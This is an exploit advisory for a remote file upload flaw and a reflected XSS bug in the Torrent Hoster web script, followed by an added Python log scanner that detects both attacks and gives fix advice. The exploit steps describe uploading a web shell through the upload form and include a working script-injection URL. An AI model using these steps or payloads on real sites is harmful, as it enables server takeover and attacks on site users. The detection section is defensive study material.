========================================================================================
| # Title : Torrent Hoster Remote Upload Exploit
| # Author : El-Kahina
| # Home : www.h4kz.com |
| # Script : Powered by Torrent Hoster.
| # Tested on: Windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)
| # Bug : Upload
====================== Exploit By El-Kahina =================================
# Exploit :

1 - Use Tamper Data :

http://127.0.0.1/torrenthoster//torrents.php?mode=upload

2-
<center>
Powered by Torrent Hoster
<br />
<form enctype="multipart/form-data" action="http://127.0.0.1/torrenthoster/upload.php" id="form" method="post" onsubmit="a=document.getElementById('form').style;a.display='none';b=document.getElementById('part2').style;b.display='inline';" style="display: inline;">
<strong>���� ��� ����� �� ��:</strong> <?php echo $maxfilesize; ?>��������<br />
<br>
<input type="file" name="upfile" size="50" /><br />
<input type="submit" value="��� �����" id="upload" />
</form>
<div id="part2" style="display: none;">��� ��� ����� .. �� ���� �����</div>
</center>

3 - http://127.0.0.1/torrenthoster/torrents/ (to find shell)

4 - XSS:

http://127.0.0.1/torrenthoster/users/forgot_password.php/>"><ScRiPt>alert(00213771818860)</ScRiPt>
==========================================
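Detection-side view of the steps above, as an added example that is not part of the original advisory: a Python scan of web access logs for a client that POSTs to upload.php and then fetches a non-.torrent file from /torrents/, and for markup appended to a .php path as in step 4. The combined log format, the sample lines and the severity labels are assumptions.

```python
import re
from urllib.parse import unquote

# Assumption: Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:13:55:01 +0000] "GET /torrenthoster/torrents.php?mode=upload HTTP/1.1" 200 2311',
    '203.0.113.7 - - [01/Jan/2024:13:55:20 +0000] "POST /torrenthoster/upload.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:13:55:41 +0000] "GET /torrenthoster/torrents/ HTTP/1.1" 200 890',
    '203.0.113.7 - - [01/Jan/2024:13:56:02 +0000] "GET /torrenthoster/torrents/x.php HTTP/1.1" 200 40',
    '198.51.100.9 - - [01/Jan/2024:14:01:00 +0000] "GET /torrenthoster/torrents/ubuntu.torrent HTTP/1.1" 200 9000',
    '198.51.100.9 - - [01/Jan/2024:14:02:00 +0000] "GET /torrenthoster/users/forgot_password.php/%3E%22%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E HTTP/1.1" 200 700',
]

def scan(lines):
    """Return (line_no, ip, severity, reason) tuples for suspicious requests."""
    uploaders = set()  # client IPs that have POSTed to upload.php
    alerts = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        ip = m['ip']
        # Drop the query string, then decode and lowercase the path.
        path = unquote(m['uri'].split('?', 1)[0]).lower()
        if m['method'] == 'POST' and path.endswith('/upload.php'):
            uploaders.add(ip)
        elif '/torrents/' in path:
            name = path.rsplit('/', 1)[1]
            # The upload directory should only ever serve *.torrent files.
            if name and not name.endswith('.torrent'):
                served = m['status'] == '200'
                sev = 'high' if served and ip in uploaders else 'medium'
                alerts.append((n, ip, sev, 'non-torrent file requested from /torrents/'))
        # Markup characters after "script.php/" (PATH_INFO) indicate an XSS probe.
        tail = path.partition('.php/')[2]
        if any(c in tail for c in '<>"'):
            alerts.append((n, ip, 'medium', 'markup in PATH_INFO'))
    return alerts

if __name__ == '__main__':
    for alert in scan(SAMPLE):
        print(alert)
```

The same two conditions point at the fixes: upload.php should accept only files that parse as torrents and store them where the server will not execute them, and forgot_password.php should HTML-encode any part of the request path it echoes.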
Greetz : Exploit-db Team
All my friends : (Dz-Ghost Team)
I'm indoushka's sister
------------------------------------------ |